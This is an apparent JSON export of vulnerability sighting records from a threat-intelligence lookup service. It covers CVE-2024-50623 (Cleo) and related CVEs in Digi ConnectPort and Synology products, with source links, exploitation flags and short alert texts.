{"vulnerability": "CVE-2024-5062", "sightings": [{"uuid": "5ca245c4-4de5-43e9-8865-161ee4cc7582", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "c933734a-9be8-4142-889e-26e95c752803", "vulnerability": "CVE-2024-50623", "type": "exploited", "source": "", "content": "", "creation_timestamp": "2024-12-10T07:41:48.976489Z"}, {"uuid": "337b5393-9403-42d2-ae89-f074e1ce3f97", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-50625", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113624985721757234", "content": "", "creation_timestamp": "2024-12-09T21:28:09.974852Z"}, {"uuid": "0cfb3284-5900-40c4-9921-de909f3ff6c9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-50626", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113624985735998812", "content": "", "creation_timestamp": "2024-12-09T21:28:10.548955Z"}, {"uuid": "f877df02-adfa-4cc5-a4cc-fec151b0313a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-50627", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113624985770900399", "content": "", "creation_timestamp": "2024-12-09T21:28:10.742238Z"}, {"uuid": "62c15f1a-04c6-49f4-8bdb-36d4187cb427", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-50628", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113624985784535663", "content": "", "creation_timestamp": "2024-12-09T21:28:11.056544Z"}, {"uuid": "f841ae0c-990b-4ea4-b670-024c02bce516", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-50623", "type": "seen", "source": "https://infosec.exchange/users/screaminggoat/statuses/113626496423360521", "content": "", "creation_timestamp": "2024-12-10T03:52:21.611050Z"}, {"uuid": "db57375e-4850-47ba-bbcc-8dae72677ae4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-50623", "type": "seen", "source": "https://infosec.exchange/users/screaminggoat/statuses/113626518565411039", "content": "", "creation_timestamp": "2024-12-10T03:57:59.345805Z"}, {"uuid": "76dae684-6c51-4fde-9c2b-ab41cd33e5fb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-50623", "type": "seen", "source": "https://social.circl.lu/users/circl/statuses/113627470197820215", "content": "", "creation_timestamp": "2024-12-10T08:00:00.471508Z"}, {"uuid": "b81a4a0c-ad84-4d6f-b0ba-aa7d02ae1eee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2024-50623", "type": "seen", "source": "https://infosec.exchange/users/zeljkazorz/statuses/113628804964200905", "content": "", "creation_timestamp": "2024-12-10T13:39:26.826273Z"}, {"uuid": "969cb542-edee-434e-8f29-366f8a759b3b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2024-50623", "type": "seen", "source": "https://infosec.exchange/users/catc0n/statuses/113628939590837277", "content": "", "creation_timestamp": "2024-12-10T14:13:41.125914Z"}, {"uuid": "e6223d34-f195-4fda-8b55-68a45cf7b8a5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2024-50623", "type": "seen", "source": "https://cyberplace.social/users/GossiTheDog/statuses/113628944616878792", "content": "", "creation_timestamp": "2024-12-10T14:15:11.826067Z"}, {"uuid": "c9883a27-148a-47b5-8a4c-41e64022a34c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-50623", "type": "seen", "source": "MISP/5ac29be4-309c-436f-84ff-49dd4f98e940", "content": "", "creation_timestamp": "2024-12-10T14:29:21.000000Z"}, {"uuid": "2b4406ef-895f-40d9-bb52-08731be62a43", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2024-50623", "type": "seen", "source": "https://infosec.exchange/users/zeljkazorz/statuses/113630600585606170", "content": "", "creation_timestamp": "2024-12-10T21:16:06.138566Z"}, {"uuid": "250105b0-888a-40ab-ac63-5fe2baa7df7c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-50623", "type": "seen", "source": "https://infosec.exchange/users/screaminggoat/statuses/113635158920284907", "content": "", "creation_timestamp": "2024-12-11T16:35:20.796486Z"}, {"uuid": "36e89acb-25c6-41ff-bba3-52736fc7f3f4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2024-50623", "type": "seen", "source": "https://cyberplace.social/users/GossiTheDog/statuses/113635625687064538", "content": "", "creation_timestamp": "2024-12-11T18:34:15.148338Z"}, {"uuid": "5795f0da-0219-4cfc-9a33-9f4be41e2d8d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-50623", "type": "seen", "source": "https://infosec.exchange/users/screaminggoat/statuses/113637401438319624", "content": "", "creation_timestamp": "2024-12-12T02:05:39.024639Z"}, {"uuid": "5e005203-dfb3-4b94-ad5e-0ab2a512d6f3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-50623", "type": "seen", "source": "https://infosec.exchange/users/dragonjar/statuses/113639507416406925", "content": "", "creation_timestamp": "2024-12-12T11:01:14.662178Z"}, {"uuid": "1d655007-bece-43f0-b0ef-c5c69b37c777", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2024-50623", "type": "seen", "source": "https://infosec.exchange/users/DarkWebInformer/statuses/113640692390757136", "content": "", "creation_timestamp": "2024-12-12T16:02:36.223297Z"}, {"uuid": "55c9460c-e79f-4395-af97-56222fddabb8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-50623", "type": "confirmed", "source": "https://github.com/projectdiscovery/nuclei-templates/tree/main/http/cves/2024/CVE-2024-50623.yaml", "content": "", "creation_timestamp": "2024-12-11T16:43:28.000000Z"}, {"uuid": "ebd5a073-52d0-4f7e-beaf-8ffb36bbad85", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-50623", "type": "seen", "source": "https://infosec.exchange/users/screaminggoat/statuses/113641313861328732", "content": "", "creation_timestamp": "2024-12-12T18:40:37.539558Z"}, {"uuid": "4083381f-ae9d-4b26-9eb0-37fbeddccea2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-50623", "type": "seen", "source": "https://infosec.exchange/users/screaminggoat/statuses/113643354146992952", "content": "", "creation_timestamp": "2024-12-13T03:19:30.249020Z"}, {"uuid": "990aba38-b99b-4faa-b7fd-42f3695d843f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-50623", "type": "seen", "source": "https://infosec.exchange/users/screaminggoat/statuses/113646529955861922", "content": "", "creation_timestamp": "2024-12-13T16:47:09.038887Z"}, {"uuid": "e21a09a0-9419-4a29-97cc-acd9aa83a08e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-50623", "type": "seen", "source": "https://infosec.exchange/users/screaminggoat/statuses/113647075503928614", "content": "", "creation_timestamp": "2024-12-13T19:05:53.641414Z"}, {"uuid": "cfa711a3-2667-453e-bf6c-d17ebdad3d5b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-50623", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2024-12-13T21:10:02.000000Z"}, {"uuid": "ff5a7b3d-2dc9-496b-8a73-88507cadd59c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-50623", "type": "seen", "source": "https://feedsin.space/feed/CISAKevBot/items/2894511", "content": "", "creation_timestamp": "2024-12-13T21:29:04.593729Z"}, {"uuid": "c425a222-09f3-4a2b-9ae2-9138e826ad6b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-50623", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113656290741715294", "content": "", "creation_timestamp": "2024-12-15T10:09:26.599987Z"}, {"uuid": "ccb44029-d1e9-4cfe-b0db-cf8acaae51b0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2024-50623", "type": "seen", "source": "https://infosec.exchange/users/shadowserver/statuses/113656947909919073", "content": "", "creation_timestamp": "2024-12-15T12:56:35.984098Z"}, {"uuid": "8a2a3267-69e6-4cb6-9b9e-da15ba1a0a0a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-50623", "type": "seen", "source": "https://infosec.exchange/users/catc0n/statuses/113662633470258921", "content": "", "creation_timestamp": "2024-12-16T13:02:28.934197Z"}, {"uuid": "71c53d60-7872-4c8d-8b53-3d66c0d4fa36", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2024-50623", "type": "seen", "source": "https://bsky.app/profile/securitycipher.bsky.social/post/3ldxorp5cwf2w", "content": "", "creation_timestamp": "2024-12-23T10:08:59.294637Z"}, {"uuid": "653f2f7f-cbfb-4083-99e6-eed64b9d2c31", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-50623", "type": "seen", "source": "https://bsky.app/profile/hackingne.ws/post/3le2mfdy2rd2p", "content": "", "creation_timestamp": "2024-12-24T14:04:16.795968Z"}, {"uuid": "9bb218d5-ec0a-4d85-9a8a-5399482bb026", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-50623", "type": "seen", "source": "https://bsky.app/profile/kyosuke-tanaka.bsky.social/post/3le3wtpmiyk25", "content": "", "creation_timestamp": "2024-12-25T02:43:56.072364Z"}, {"uuid": "3151b52d-f899-454e-9327-0da3f6cc0a70", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-50623", "type": "seen", "source": "https://infosec.exchange/users/screaminggoat/statuses/113867636525001029", "content": "", "creation_timestamp": "2025-01-21T17:57:27.641006Z"}, {"uuid": "2142ec98-8a95-45b2-b887-12289e42ffd5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-50623", "type": "seen", "source": "https://bsky.app/profile/hackingne.ws/post/3lkntltqrh62p", "content": "", "creation_timestamp": "2025-03-18T14:04:55.163189Z"}, {"uuid": "2d302db2-b737-40bb-b740-9d78352b27bf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-50623", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2025-02-23T02:11:02.000000Z"}, {"uuid": "ae4d7151-6068-4916-ae10-3bff76fa7e81", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-50623", "type": "seen", "source": "https://bsky.app/profile/mytechnotalent.bsky.social/post/3lmcknqmpx22d", "content": "", "creation_timestamp": "2025-04-08T13:16:05.939182Z"}, {"uuid": "67778b09-3005-4892-91cf-38698fd3a2be", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-50629", "type": "seen", "source": "http://www.zerodayinitiative.com/advisories/ZDI-25-211/", "content": "", "creation_timestamp": "2025-04-09T03:00:00.000000Z"}, {"uuid": "3ec1d0ca-4bd8-459f-a17a-528dae284654", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-50623", "type": "seen", "source": "https://bsky.app/profile/cecallihelper.bsky.social/post/3lmufq36wtc2u", "content": "", "creation_timestamp": "2025-04-15T15:35:50.386224Z"}, {"uuid": "4c310aaa-600b-4a3d-8ca5-f27be922f2e9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-50623", "type": "seen", "source": "https://bsky.app/profile/ytroncal.bsky.social/post/3m26ubkcisk2m", "content": "", "creation_timestamp": "2025-10-02T05:50:17.970808Z"}, {"uuid": "fe26500c-75c1-46c7-8012-1797699cd338", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-50629", "type": "seen", "source": "MISP/02fb130c-7874-4693-9b66-81ed91a2e996", "content": "", "creation_timestamp": "2025-08-12T13:33:28.000000Z"}, {"uuid": "ef4d796b-7218-419c-8ef7-7e11b273266e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-50623", "type": "seen", "source": "https://gist.github.com/emadshanab/5067c5055f2656e694af9c7a26104a71", "content": "", "creation_timestamp": "2025-10-12T00:42:21.000000Z"}, {"uuid": "7dd36926-7c0f-4caa-b764-72d0bba707bc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-50629", "type": "seen", "source": "MISP/02fb130c-7874-4693-9b66-81ed91a2e996", "content": "", "creation_timestamp": "2025-08-21T03:19:28.000000Z"}, {"uuid": "6eaaf71f-2ecd-4f2b-a402-b77b2964cf9e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-50623", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-01-05)", "content": "", "creation_timestamp": "2026-01-05T00:00:00.000000Z"}, {"uuid": "ecb24972-8e11-4d15-b9c7-86b77d5693f4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "c933734a-9be8-4142-889e-26e95c752803", "vulnerability": "CVE-2024-50623", "type": "seen", "source": "https://vulnerability.circl.lu/comment/92cdf9dd-1009-427b-8181-b444dc288f89", "content": "", "creation_timestamp": "2024-12-10T07:56:04.828065Z"}, {"uuid": "639a0a00-fe14-4214-8e6c-a982cd30b7a1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "c933734a-9be8-4142-889e-26e95c752803", "vulnerability": "CVE-2024-50623", "type": "seen", "source": "https://vulnerability.circl.lu/bundle/cb44f848-2e46-430a-b089-517177296c87", "content": "", "creation_timestamp": "2024-12-15T10:09:25.481534Z"}, {"uuid": "a0598db5-07d4-4c6e-93be-9ea293ee2712", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2024-50623", "type": "exploited", "source": "https://vulnerability.circl.lu/known-exploited-vulnerabilities-catalog/13ba7b76-4ab9-4563-890b-8e54d0fa4e13", "content": "", "creation_timestamp": "2026-02-02T12:26:18.729920Z"}, {"uuid": "b996cd5e-77b8-4ff3-8151-49a99b0f10fd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-50623", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-04-02)", "content": "", "creation_timestamp": "2026-04-02T00:00:00.000000Z"}, {"uuid": "3441ffb0-c0fd-47e6-aeee-43c8a4d7ccc3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-50623", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-04-02)", "content": "", "creation_timestamp": "2026-04-02T00:00:00.000000Z"}, {"uuid": "2b573cb6-d324-48cd-a505-6e475a905ad2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-50623", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/9662", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCleo \u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\u6279\u91cf\u68c0\u6d4b\u811a\u672c\uff08CVE-2024-50623\uff09\nURL\uff1ahttps://github.com/iSee857/Cleo-CVE-2024-50623-PoC\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-12-31T07:45:47.000000Z"}, {"uuid": "04796aa3-b8a7-4cfb-8f90-e085720404da", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-50629", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/8030", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-50629\n\ud83d\udd25 CVSS Score: 5.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)\n\ud83d\udd39 Description: Improper encoding or escaping of output vulnerability in the webapi component in Synology BeeStation Manager (BSM) before 1.1-65374, Synology DiskStation Manager (DSM) before 6.2.4-25556-8, 7.1.1-42962-7, 7.2-64570-4, 7.2.1-69057-6 and 7.2.2-72806-1 and Synology Unified Controller (DSMUC) before 3.1.4-23079 allows remote attackers to read limited files via unspecified vectors.\n\ud83d\udccf Published: 2025-03-19T05:49:56.438Z\n\ud83d\udccf Modified: 2025-03-19T05:49:56.438Z\n\ud83d\udd17 References:\n1. https://www.synology.com/en-global/security/advisory/Synology_SA_24_20\n2. https://www.synology.com/en-global/security/advisory/Synology_SA_24_23", "creation_timestamp": "2025-03-19T06:52:08.000000Z"}, {"uuid": "9d4bda40-9486-46c9-a469-d7406ba853c7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-50629", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9037", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-50629\n\ud83d\udd25 CVSS Score: 5.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)\n\ud83d\udd39 Description: Improper encoding or escaping of output vulnerability in the webapi component in Synology BeeStation OS (BSM) before 1.1-65374 and Synology DiskStation Manager (DSM) before 7.1.1-42962-7, 7.2-64570-4, 7.2.1-69057-6 and 7.2.2-72806-1 allow remote attackers to read limited files via unspecified vectors.\n\ud83d\udccf Published: 2025-03-19T05:49:56.438Z\n\ud83d\udccf Modified: 2025-03-27T09:01:56.635Z\n\ud83d\udd17 References:\n1. https://www.synology.com/en-global/security/advisory/Synology_SA_24_20\n2. https://www.synology.com/en-global/security/advisory/Synology_SA_24_23", "creation_timestamp": "2025-03-27T09:26:59.000000Z"}, {"uuid": "03a5a176-e7ac-426c-a8f5-860cecece58c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-50629", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/61117", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aRCE\n\u63cf\u8ff0\uff1aN-day Exploit for Synology BeeStation RCE by DEVCORE (Pwn2Own 2024)\nURL\uff1ahttps://github.com/kiddo-pwn/CVE-2024-50629_50631\n\n\u6807\u7b7e\uff1a#RCE", "creation_timestamp": "2025-11-29T14:13:45.000000Z"}, {"uuid": "18383d90-b38e-450b-855a-3c2f017e4b82", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-50623", "type": "published-proof-of-concept", "source": "Telegram/8q0G2XoGgrXP8O-oMiUuoKtzfH3vGd_RQiplze-y2V_UL3MF", "content": "", "creation_timestamp": "2025-07-13T02:12:02.000000Z"}, {"uuid": "40af05df-f49e-4bf5-8ef1-9530a6a741e5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-50623", "type": "seen", "source": "Telegram/h9HbZ2k29WBhPqZedI7raK6Z0Uo2xDhBpR3YwH0Zr2iyDfc", "content": "", "creation_timestamp": "2025-07-22T12:59:19.000000Z"}, {"uuid": "e3119dd8-b405-45f3-8bb0-c6020a07c456", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-50623", "type": "published-proof-of-concept", "source": "Telegram/ZmNdkUlwMi8wIyWb9PMqpqbhuxrMGAAlpZqMM06bDWpior15", "content": "", "creation_timestamp": "2025-07-13T02:12:00.000000Z"}, {"uuid": "c1591f13-0bc2-4d5d-8395-6f47c8f10634", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-50623", "type": "published-proof-of-concept", "source": "Telegram/51t8UUBcVa-x2wjoRIM2mT2i7yna57J_B3bG-USYfuPX_VI", "content": "", "creation_timestamp": "2025-07-13T02:12:01.000000Z"}, {"uuid": "5c1eddaa-e884-4ede-a8b9-3b18dc44a134", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-50623", "type": "seen", "source": "https://t.me/CyberBulletin/1741", "content": "\u26a1\ufe0fModular Java Backdoor Emerges in Cleo Exploitation Campaign (CVE-2024-50623) \n\n#CyberBulletin", "creation_timestamp": "2024-12-13T12:45:07.000000Z"}, {"uuid": "78a30f9c-4f2c-4499-ba1b-fe185e7e3e94", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-50629", "type": "seen", "source": "https://t.me/cvedetector/20620", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-50629 - Synology BeeStation Manager/DiskStation Manager/Unified Controller File Disclosure\", \n  \"Content\": \"CVE ID : CVE-2024-50629 \nPublished : March 19, 2025, 6:15 a.m. | 39\u00a0minutes ago \nDescription : Improper encoding or escaping of output vulnerability in the webapi component in Synology BeeStation Manager (BSM) before 1.1-65374, Synology DiskStation Manager (DSM) before 6.2.4-25556-8, 7.1.1-42962-7, 7.2-64570-4, 7.2.1-69057-6 and 7.2.2-72806-1 and Synology Unified Controller (DSMUC) before 3.1.4-23079 allows remote attackers to read limited files via unspecified vectors. \nSeverity: 5.3 | MEDIUM \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"19 Mar 2025\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2025-03-19T07:57:35.000000Z"}, {"uuid": "e4658648-d287-4ff5-a2b7-30b9cf051c16", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-50628", "type": "seen", "source": "https://t.me/cvedetector/12456", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-50628 - Digi ConnectPort LTS Privilege Escalation\", \n  \"Content\": \"CVE ID : CVE-2024-50628 \nPublished : Dec. 9, 2024, 10:15 p.m. | 37\u00a0minutes ago \nDescription : An issue was discovered in the web services of Digi ConnectPort LTS before 1.4.12. It allows an attacker on the local area network to achieve unauthorized manipulation of resources, which may lead to remote code execution when combined with other issues. \nSeverity: 0.0 | NA \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"09 Dec 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-12-09T23:54:44.000000Z"}, {"uuid": "55833801-bfaa-420e-9be0-646eb1bcf12a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-50627", "type": "seen", "source": "https://t.me/cvedetector/12455", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-50627 - Digi ConnectPort LTS Privilege Escalation File Upload Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2024-50627 \nPublished : Dec. 9, 2024, 10:15 p.m. | 37\u00a0minutes ago \nDescription : An issue was discovered in Digi ConnectPort LTS before 1.4.12. A Privilege Escalation vulnerability exists in the file upload feature. It allows an attacker on the local area network (with specific permissions) to upload and execute malicious files, potentially leading to unauthorized system access. \nSeverity: 0.0 | NA \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"09 Dec 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-12-09T23:54:40.000000Z"}, {"uuid": "68c41d29-443f-49fe-b6f6-d11917d6a76e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-50626", "type": "seen", "source": "https://t.me/cvedetector/12454", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-50626 - Digi ConnectPort LTS Directory Traversal Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2024-50626 \nPublished : Dec. 9, 2024, 10:15 p.m. | 37\u00a0minutes ago \nDescription : An issue was discovered in Digi ConnectPort LTS before 1.4.12. A Directory Traversal vulnerability exists in WebFS. This allows an attacker on the local area network to manipulate URLs to include traversal sequences, potentially leading to unauthorized access to data. \nSeverity: 0.0 | NA \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"09 Dec 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-12-09T23:54:39.000000Z"}, {"uuid": "c5cdc557-47c8-4c97-856c-0ffc894c1f2d", "vulnerability_lookup_origin": 